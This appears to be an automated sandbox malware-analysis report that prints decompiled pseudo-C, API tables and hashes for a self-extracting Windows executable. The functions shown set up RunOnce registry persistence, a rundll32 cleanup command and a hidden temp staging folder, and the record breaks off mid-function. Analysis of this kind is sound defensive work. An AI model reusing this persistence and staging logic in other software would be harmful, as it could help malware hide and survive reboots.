                                                                                                                                                                                                                                              • Opcode ID: e88369ef24c4f3dc52f947031a3d192a1d3f540f56d36a74d6efaae32a215f96
                                                                                                                                                                                                                                              • Instruction ID: 1196e7adbe6f827bc716a22c41fa3b1c347988d00169cfa5bb61a42eb3be1aac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e88369ef24c4f3dc52f947031a3d192a1d3f540f56d36a74d6efaae32a215f96
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11C2B1200205ABD720FBF5AE88B7F37A9AB84791B480126F901D3290DA34DC138761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A86F40() {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(E00A86EF0); // executed
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x00a86f45
                                                                                                                                                                                                                                              0x00a86f4d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A86F45
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: b5d64587928c1ad3f0067ccad9923ccda0878c67cfcb269fe3bb90f5e2d376d3
                                                                                                                                                                                                                                              • Instruction ID: 195830e488dd25a6e67ce355811cabd793e850f13dac6a34dc6d669393180086
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5d64587928c1ad3f0067ccad9923ccda0878c67cfcb269fe3bb90f5e2d376d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D090027425110057B6106BB0DD1D41575916A5D602F8159A1A111C4498DB6040415712
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A8202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				void* _v532;
                                                                                                                                                                                                                                              				int _v536;
                                                                                                                                                                                                                                              				int _v540;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				void _t56;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              				intOrPtr* _t72;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                                                              				intOrPtr* _t81;
                                                                                                                                                                                                                                              				void* _t86;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t90;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                              				signed int _t93;
                                                                                                                                                                                                                                              				void* _t94;
                                                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t79 = __edx;
                                                                                                                                                                                                                                              				_t28 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                              				_t84 = 0x104;
                                                                                                                                                                                                                                              				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                              				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                                                                              				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					L24:
                                                                                                                                                                                                                                              					return E00A86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(_t86);
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E00A8171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                              					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                              					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                              					if(_t41 != 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t87 = _t87 + 1;
                                                                                                                                                                                                                                              					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                              					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                              					_t79 = _t84;
                                                                                                                                                                                                                                              					E00A8658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                              					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                              					_t84 = _t46;
                                                                                                                                                                                                                                              					if(_t84 == 0) {
                                                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                                                              						if(GetModuleFileNameA( *0xa89a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              							L17:
                                                                                                                                                                                                                                              							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							_pop(_t86);
                                                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						_t72 =  &_v268;
                                                                                                                                                                                                                                              						_t80 = _t72 + 1;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t49 =  *_t72;
                                                                                                                                                                                                                                              							_t72 = _t72 + 1;
                                                                                                                                                                                                                                              						} while (_t49 != 0);
                                                                                                                                                                                                                                              						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                              						_t81 = 0xa891e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t50 =  *_t81;
                                                                                                                                                                                                                                              							_t81 = _t81 + 1;
                                                                                                                                                                                                                                              						} while (_t50 != 0);
                                                                                                                                                                                                                                              						_t84 = _t73 + 0x50 + _t81 - 0xa891e5;
                                                                                                                                                                                                                                              						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa891e5);
                                                                                                                                                                                                                                              						if(_t90 != 0) {
                                                                                                                                                                                                                                              							 *0xa88580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                              							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                              							if(_t66 == 0) {
                                                                                                                                                                                                                                              								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              							E00A8171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                              							_t75 = _t90;
                                                                                                                                                                                                                                              							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                              							_t79 = _t23;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t56 =  *_t75;
                                                                                                                                                                                                                                              								_t75 = _t75 + 1;
                                                                                                                                                                                                                                              							} while (_t56 != 0);
                                                                                                                                                                                                                                              							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                              							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                              							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                              							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t79 = 0x4b5;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                              					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                              					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                              					if(_t91 == 0) {
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              						E00A8658A( &_v268, 0x104, 0xa81140);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                              				 *0xa88530 = _t66;
                                                                                                                                                                                                                                              				goto L23;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x00a8202a
                                                                                                                                                                                                                                              0x00a82035
                                                                                                                                                                                                                                              0x00a8203c
                                                                                                                                                                                                                                              0x00a82041
                                                                                                                                                                                                                                              0x00a82050
                                                                                                                                                                                                                                              0x00a8205f
                                                                                                                                                                                                                                              0x00a82064
                                                                                                                                                                                                                                              0x00a8206f
                                                                                                                                                                                                                                              0x00a8208c
                                                                                                                                                                                                                                              0x00a82094
                                                                                                                                                                                                                                              0x00a82257
                                                                                                                                                                                                                                              0x00a82266
                                                                                                                                                                                                                                              0x00a82266
                                                                                                                                                                                                                                              0x00a8209a
                                                                                                                                                                                                                                              0x00a8209b
                                                                                                                                                                                                                                              0x00a8209d
                                                                                                                                                                                                                                              0x00a820aa
                                                                                                                                                                                                                                              0x00a820af
                                                                                                                                                                                                                                              0x00a820c9
                                                                                                                                                                                                                                              0x00a820d1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a820d3
                                                                                                                                                                                                                                              0x00a820da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a820da
                                                                                                                                                                                                                                              0x00a820e2
                                                                                                                                                                                                                                              0x00a82103
                                                                                                                                                                                                                                              0x00a8210e
                                                                                                                                                                                                                                              0x00a82116
                                                                                                                                                                                                                                              0x00a82122
                                                                                                                                                                                                                                              0x00a82128
                                                                                                                                                                                                                                              0x00a8212c
                                                                                                                                                                                                                                              0x00a82179
                                                                                                                                                                                                                                              0x00a82194
                                                                                                                                                                                                                                              0x00a821de
                                                                                                                                                                                                                                              0x00a821e4
                                                                                                                                                                                                                                              0x00a82256
                                                                                                                                                                                                                                              0x00a82256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82256
                                                                                                                                                                                                                                              0x00a82196
                                                                                                                                                                                                                                              0x00a82196
                                                                                                                                                                                                                                              0x00a8219c
                                                                                                                                                                                                                                              0x00a8219f
                                                                                                                                                                                                                                              0x00a8219f
                                                                                                                                                                                                                                              0x00a821a1
                                                                                                                                                                                                                                              0x00a821a2
                                                                                                                                                                                                                                              0x00a821a6
                                                                                                                                                                                                                                              0x00a821a8
                                                                                                                                                                                                                                              0x00a821b0
                                                                                                                                                                                                                                              0x00a821b0
                                                                                                                                                                                                                                              0x00a821b2
                                                                                                                                                                                                                                              0x00a821b3
                                                                                                                                                                                                                                              0x00a821bc
                                                                                                                                                                                                                                              0x00a821c7
                                                                                                                                                                                                                                              0x00a821cb
                                                                                                                                                                                                                                              0x00a821f1
                                                                                                                                                                                                                                              0x00a821f6
                                                                                                                                                                                                                                              0x00a821fd
                                                                                                                                                                                                                                              0x00a821ff
                                                                                                                                                                                                                                              0x00a821ff
                                                                                                                                                                                                                                              0x00a82204
                                                                                                                                                                                                                                              0x00a82213
                                                                                                                                                                                                                                              0x00a82218
                                                                                                                                                                                                                                              0x00a8221d
                                                                                                                                                                                                                                              0x00a8221d
                                                                                                                                                                                                                                              0x00a82220
                                                                                                                                                                                                                                              0x00a82220
                                                                                                                                                                                                                                              0x00a82222
                                                                                                                                                                                                                                              0x00a82223
                                                                                                                                                                                                                                              0x00a82229
                                                                                                                                                                                                                                              0x00a8223d
                                                                                                                                                                                                                                              0x00a82249
                                                                                                                                                                                                                                              0x00a82250
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82250
                                                                                                                                                                                                                                              0x00a821d2
                                                                                                                                                                                                                                              0x00a821d9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a821d9
                                                                                                                                                                                                                                              0x00a8213a
                                                                                                                                                                                                                                              0x00a82141
                                                                                                                                                                                                                                              0x00a82144
                                                                                                                                                                                                                                              0x00a8214c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82163
                                                                                                                                                                                                                                              0x00a82172
                                                                                                                                                                                                                                              0x00a82172
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82163
                                                                                                                                                                                                                                              0x00a820ea
                                                                                                                                                                                                                                              0x00a820f0
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A82050
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A8205F
                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A8208C
                                                                                                                                                                                                                                                • Part of subcall function 00A8171E: _vsnprintf.MSVCRT ref: 00A81750
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A820C9
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A820EA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A82103
                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82122
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A82134
                                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82144
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A8215B
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A8218C
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A821C1
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A821E4
                                                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A8223D
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82249
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A82250
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                              • API String ID: 178549006-2699677747
                                                                                                                                                                                                                                              • Opcode ID: 72c74bc2b1ab0d4ac1b92a33f08c233bc8a79c5a523195258cede7872024e28d
                                                                                                                                                                                                                                              • Instruction ID: d6f15783b2db118831cb521cdf49969ed8049e21f9f77ba085be484d41938d98
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c74bc2b1ab0d4ac1b92a33f08c233bc8a79c5a523195258cede7872024e28d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9510571A00214ABEB20FBA0DC4DFFB777CEB54700F1002A9FA49E6150EE759E468B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 232 a855a0-a855d9 call a8468f LocalAlloc 235 a855db-a855f1 call a844b9 call a86285 232->235 236 a855fd-a8560c call a8468f 232->236 251 a855f6-a855f8 235->251 242 a8560e-a85630 call a844b9 LocalFree 236->242 243 a85632-a85643 lstrcmpA 236->243 242->251 245 a8564b-a85659 LocalFree 243->245 246 a85645 243->246 249 a8565b-a8565d 245->249 250 a85696-a8569c 245->250 246->245 252 a85669 249->252 253 a8565f-a85667 249->253 255 a8589f-a858b5 call a86517 250->255 256 a856a2-a856a8 250->256 254 a858b7-a858c7 call a86ce0 251->254 258 a8566b-a8567a call a85467 252->258 253->252 253->258 255->254 256->255 257 a856ae-a856c1 GetTempPathA 256->257 261 a856f3-a85711 call a81781 257->261 262 a856c3-a856c9 call a85467 257->262 270 a8589b-a8589d 258->270 271 a85680-a85691 call a844b9 258->271 275 a8586c-a85890 GetWindowsDirectoryA call a8597d 261->275 276 a85717-a85729 GetDriveTypeA 261->276 269 a856ce-a856d0 262->269 269->270 273 a856d6-a856df call a82630 269->273 270->254 271->251 273->261 288 a856e1-a856ed call a85467 273->288 275->261 289 a85896 275->289 280 a8572b-a8572e 276->280 281 a85730-a85740 GetFileAttributesA 276->281 280->281 283 a85742-a85745 280->283 282 a8577e-a8578f call a8597d 281->282 281->283 298 a85791-a8579e call a82630 282->298 299 a857b2-a857bf call a82630 282->299 286 a8576b 283->286 287 a85747-a8574f 283->287 291 a85771-a85779 286->291 287->291 292 a85751-a85753 287->292 288->261 288->270 289->270 296 a85864-a85866 291->296 292->291 295 a85755-a85762 call a86952 292->295 295->286 308 a85764-a85769 295->308 296->275 296->276 298->286 309 a857a0-a857b0 call a8597d 298->309 306 a857c1-a857cd GetWindowsDirectoryA 299->306 307 a857d3-a857f8 call a8658a GetFileAttributesA 299->307 306->307 314 a8580a 307->314 315 a857fa-a85808 CreateDirectoryA 307->315 308->282 308->286 309->286 309->299 316 a8580d-a8580f 314->316 315->316 317 a85811-a85825 316->317 318 a85827-a8585c SetFileAttributesA call a81781 call a85467 316->318 317->296 318->270 323 a8585e 318->323 323->296
                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E00A855A0(void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v265;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				int _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t35;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                                                                              				long _t48;
                                                                                                                                                                                                                                              				int _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				char _t60;
                                                                                                                                                                                                                                              				int _t65;
                                                                                                                                                                                                                                              				char _t66;
                                                                                                                                                                                                                                              				int _t67;
                                                                                                                                                                                                                                              				int _t68;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				int _t70;
                                                                                                                                                                                                                                              				int _t71;
                                                                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                              				int _t73;
                                                                                                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                                                                                                              				CHAR* _t88;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                              				_t2 = E00A8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                              				if(_t109 != 0) {
                                                                                                                                                                                                                                              					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                              					_t32 = E00A8468F(_t82, _t109, 1);
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                              						__eflags = _t33;
                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                              							 *0xa89a30 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						_t35 =  *0xa88b3e; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t35;
                                                                                                                                                                                                                                              						if(_t35 == 0) {
                                                                                                                                                                                                                                              							__eflags =  *0xa88a24; // 0x0
                                                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                                                              								L46:
                                                                                                                                                                                                                                              								_t101 = 0x7d2;
                                                                                                                                                                                                                                              								_t36 = E00A86517(_t82, 0x7d2, 0, E00A83210, 0, 0);
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0xa89a30; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t109 = 0xa891e4;
                                                                                                                                                                                                                                              									_t40 = GetTempPathA(0x104, 0xa891e4);
                                                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                                                              										L19:
                                                                                                                                                                                                                                              										_push(_t82);
                                                                                                                                                                                                                                              										E00A81781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                              										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                              										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                              											do {
                                                                                                                                                                                                                                              												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                              												__eflags = _t109 - 6;
                                                                                                                                                                                                                                              												if(_t109 == 6) {
                                                                                                                                                                                                                                              													L22:
                                                                                                                                                                                                                                              													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                              													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L23;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													__eflags = _t109 - 3;
                                                                                                                                                                                                                                              													if(_t109 != 3) {
                                                                                                                                                                                                                                              														L23:
                                                                                                                                                                                                                                              														__eflags = _t109 - 2;
                                                                                                                                                                                                                                              														if(_t109 != 2) {
                                                                                                                                                                                                                                              															L28:
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															goto L29;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                              															if(_t66 == 0x41) {
                                                                                                                                                                                                                                              																L29:
                                                                                                                                                                                                                                              																_t60 = _t66 + 1;
                                                                                                                                                                                                                                              																_v268 = _t60;
                                                                                                                                                                                                                                              																goto L42;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                              																if(_t66 == 0x42) {
                                                                                                                                                                                                                                              																	goto L29;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t68 = E00A86952( &_v268);
                                                                                                                                                                                                                                              																	__eflags = _t68;
                                                                                                                                                                                                                                              																	if(_t68 == 0) {
                                                                                                                                                                                                                                              																		goto L28;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                              																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                              																			L30:
                                                                                                                                                                                                                                              																			_push(0);
                                                                                                                                                                                                                                              																			_t103 = 3;
                                                                                                                                                                                                                                              																			_t49 = E00A8597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                              																			__eflags = _t49;
                                                                                                                                                                                                                                              																			if(_t49 != 0) {
                                                                                                                                                                                                                                              																				L33:
                                                                                                                                                                                                                                              																				_t50 = E00A82630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t50;
                                                                                                                                                                                                                                              																				if(_t50 != 0) {
                                                                                                                                                                                                                                              																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t88 =  &_v268;
                                                                                                                                                                                                                                              																				E00A8658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                              																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                              																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                              																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                              																					__eflags = _t54;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				__eflags = _t54;
                                                                                                                                                                                                                                              																				if(_t54 != 0) {
                                                                                                                                                                                                                                              																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                              																					_push(_t88);
                                                                                                                                                                                                                                              																					_t109 = 0xa891e4;
                                                                                                                                                                                                                                              																					E00A81781(0xa891e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                              																					_t101 = 1;
